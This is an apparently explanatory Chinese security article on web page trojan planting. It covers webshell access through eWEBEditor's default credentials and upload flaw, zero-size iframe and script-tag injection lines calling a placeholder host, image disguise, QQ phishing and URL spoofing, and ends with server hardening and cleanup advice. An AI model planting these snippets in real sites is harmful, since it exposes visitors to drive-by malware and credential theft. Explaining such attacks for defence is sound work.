1、關于網頁掛馬
網頁掛馬就是攻擊者通過在正常的頁面中(通常是網站的主頁)插入一段代碼。瀏覽者在打開該頁面的時候,這段代碼被執行,然后下載并運行某木馬的服務器端程序,進而控制瀏覽者的主機。
2、獲取Webshell
攻擊者要進行網頁掛馬,必須要獲取對站點文件的修改權限,而獲取該站點Webshell是最普遍的做法。
其實可供攻擊者實施的攻擊手段比較多,比如注入漏洞、跨站漏洞、旁注漏洞、上傳漏洞、暴庫漏洞和程序漏洞都可被利用。下面就列舉一個當前比較流行的eWEBEditor在線HTML編輯器上傳漏洞做個演示和分析。
1).網站入侵分析
eWEBEditor是一個在線的HTML編輯器,很多網站都集成這個編輯器,以方便發布信息。低版本的eWEBEditor在線HTML編輯器,存在者上傳漏洞,黑客利用這點得到WEBSHELL(網頁管理權限)后,修改了網站,進行了掛馬操作。
其原理是:eWEBEditor的默認管理員頁面沒有更改,而且默認的用戶名和密碼都沒有更改。攻擊者登陸eWEBEditor后,添加一種新的樣式類型,然后設置上傳文件的類型,加入asp文件類型,就可以上傳一個網頁木馬了。(圖1)
2).判斷分析網頁漏洞
(1).攻擊者判斷網站是否采用了eWEBEditor的方法一般都是通過瀏覽網站查看相關的頁面或者通過搜索引擎搜索類似"ewebeditor.asp?id="語句,只要類似的語句存在,就能判斷網站確實使用了WEB編輯器。
(2).eWEBEditor編輯器可能被黑客利用的安全漏洞:
a.管理員未對數據庫的路徑和名稱進行修改,導致黑客可以利用編輯器默認路徑直接對網站數據庫進行下載。
b.管理員未對編輯器的后臺管理路徑進行修改導致黑客可以通過數據庫獲得的用戶名和密碼進行登陸。或者是默認密碼。直接進入編輯器的后臺。
c.該WEB編輯器上傳程序存在安全漏洞。
分析報告指出:網站的admin路徑下發現cer.asp網頁木馬,經分析為老兵的網頁木馬。(加密后依舊能通過特征碼分辨,推薦網站管理員使用雷客ASP站長安全助手,經常檢測網站是否被非法修改。)
3、揭秘幾種最主要的掛馬技術
(1).iframe式掛馬
網頁木馬被攻擊者利用iframe語句,加載到任意網頁中都可執行的掛馬形式,是最早也是最有效的的一種網絡掛馬技術。通常的掛馬代碼如下:
| <iframe src=http://www.xxx.com/muma.html width=0 height=0></iframe> |
解釋:在打開插入該句代碼的網頁后,就也就打開了http://www.xxx.com/muma.html頁面,但是由于它的長和寬都為“0”,所以很難察覺,非常具有隱蔽性。下面我們做過做個演示,比如在某網頁中插入如下代碼:
| <iframe src=http://security.ctocio.com.cn width=200 height=200></iframe> |
在“百度”中嵌入了“IT專家網安全版塊”的頁面,效果如圖2。
(2).js腳本掛馬
js掛馬是一種利用js腳本文件調用的原理進行的網頁木馬隱蔽掛馬技術,如:黑客先制作一個.js文件,然后利用js代碼調用到掛馬的網頁。通常代碼如下:
| <script language=javascript src=http://www.xxx.com/gm.js></script> |
http://www.xxx.com/gm.js就是一個js腳本文件,通過它調用和執行木馬的服務端。這些js文件一般都可以通過工具生成,攻擊者只需輸入相關的選項就可以了,如圖3就是一個JS木馬的代碼。(圖3)
(3).圖片偽裝掛馬
隨著防毒技術的發展,黑手段也不停地更新,圖片木馬技術逃避殺毒監視的新技術,攻擊者將類似:http://www.xxx.com/test.htm中的木馬代碼植入到test.gif圖片文件中,這些嵌入代碼的圖片都可以用工具生成,攻擊者只需輸入相關的選項就可以了,如圖4。圖片木馬生成后,再利用代碼調用執行,是比較新穎的一種掛馬隱蔽方法,實例代碼如:
| <html> <iframe src="http://www.xxx.com/test.htm" height=0 width=0> </iframe> <img src="http://www.xxx.com/test.jpg"></center> </html> |
注:當用戶打開http://www.xxx.com/test.htm是,顯示給用戶的是http://www.xxx.com/test.jpg,而http://www.xxx.com/test.htm網頁代碼也隨之運行。(圖4)
#p#副標題#e#
(4).網絡釣魚式掛馬
網絡中最常見的欺騙手段,黑客們利用人們的獵奇、貪心等心理偽裝構造一個鏈接或者一個網頁,利用社會工程學欺騙方法,引誘點擊,當用戶打開一個看似正常的頁面時,網頁代碼隨之運行,隱蔽性極高。這種方式往往和欺騙用戶輸入某些個人隱私信息,然后竊取個人隱私相關聯。比如攻擊者模仿騰訊公司設計了一個獲取QQ幣的頁面,引誘輸入QQ好和密碼見圖5。
等用戶輸入完提交后,就把這些信息發送到攻擊者指定的地方見圖6。
(5).URL偽裝掛馬
高級欺騙,黑客利用IE或者Fixfox瀏覽器的設計缺陷制造的一種高級欺騙技術,當用戶訪問木馬頁面時地址欄顯示www.sina.com或者security.ctocio.com.cn等用戶信任地址,其實卻打開了被掛馬的頁面,從而實現欺騙,示例代碼如:
<p><a id="qipian" href="http://www.hacker.com.cn"></a></p>
<div>
<a href="http://security.ctocio.com.cn" target="_blank">
<table>
<caption>
<label for="qipian">
<u style="cursor;pointer;color;blue">
security.ctocio.com.cn IT專家網安全版塊
</u>
</label>
</caption>
</table>
</a>
</div>
上面的代碼的效果,貌似security.ctocio.com.cn是一個如圖7的鏈接。
如果點擊卻打開了http://www.hacker.com.cn,如圖8。
總結:上述的掛馬方式都是利用了系統的漏洞,并且掛馬的代碼不用攻擊者編寫,都是實現了工具化、傻瓜化。技術門檻比較低,因此危害也特別大。
4、網頁木馬的防御和清除
1).防御網頁木馬,服務器設置非常重要,反注冊、卸載危險組件:(網頁后門木馬調用的組件)
(1).卸載wscript.shell對象,在cmd先或者直接運行:regsvr32 /u %windir%system32WSHom.Ocx
(2).卸載FSO對象,在cmd下或者直接運行:regsvr32.exe /u %windir%system32scrrun.dll
(3).卸載stream對象,在cmd下或者直接運行:regsvr32.exe /u /s "C:Program FilesCommon FilesSystemadomsado15.dll"
注:如果想恢復的話只需重新注冊即可,例如:regsvr32 %windir%system32WSHom.Ocx
2).清理網頁掛馬
如果站點中的多個頁面被掛馬,如果手工一個個清理那幾乎是不可能的。筆者推薦“雷客圖ASP站長安全助手”,其實它也算是個Webshell,利用其提供功能可以清除網頁中的掛馬代碼。
(1).查找ASP木馬:“雷客圖”可以基于特征碼對站點內的文件進行掃描,然后找到asa、cdx、cer等格式的可疑文件,管理員可以據此確定進行判斷確定是否刪除。(圖9)
(2).文件篡改檢測:入侵者進入web之后往往會修改一些文件,利用這個功能就是在平時提取文件信息以備檢查篡改,這個功能對于定位網頁掛馬文件非常方便。
(3).清除網頁掛馬:這是“雷客圖”的輔助插件,黑客入侵網站之后可能利用腳本在特定頁面添加惡意代碼(一般是用iframe標簽指向其他網址)。由于其使用腳本一次可以修改n個文件,清理起來十分不便,該功能就是批量腳本的逆向,清理掛馬非常方便。
雷客圖ASP站長還有很多功能,比如數據庫保護、可疑文件搜索、SQL防注入等。需要說明的是,使用其一定要更改它的默認用戶名和密碼。
總結:小心被網頁掛馬所傷,不僅是對瀏覽者而言,更是針對網站的維護者。只有網站管理者加固站點的安全,從源頭上杜絕網頁木馬,才能為用戶提供安全的瀏覽環境。當然,個人用戶掌握一定的安全技能也是非常必要的。
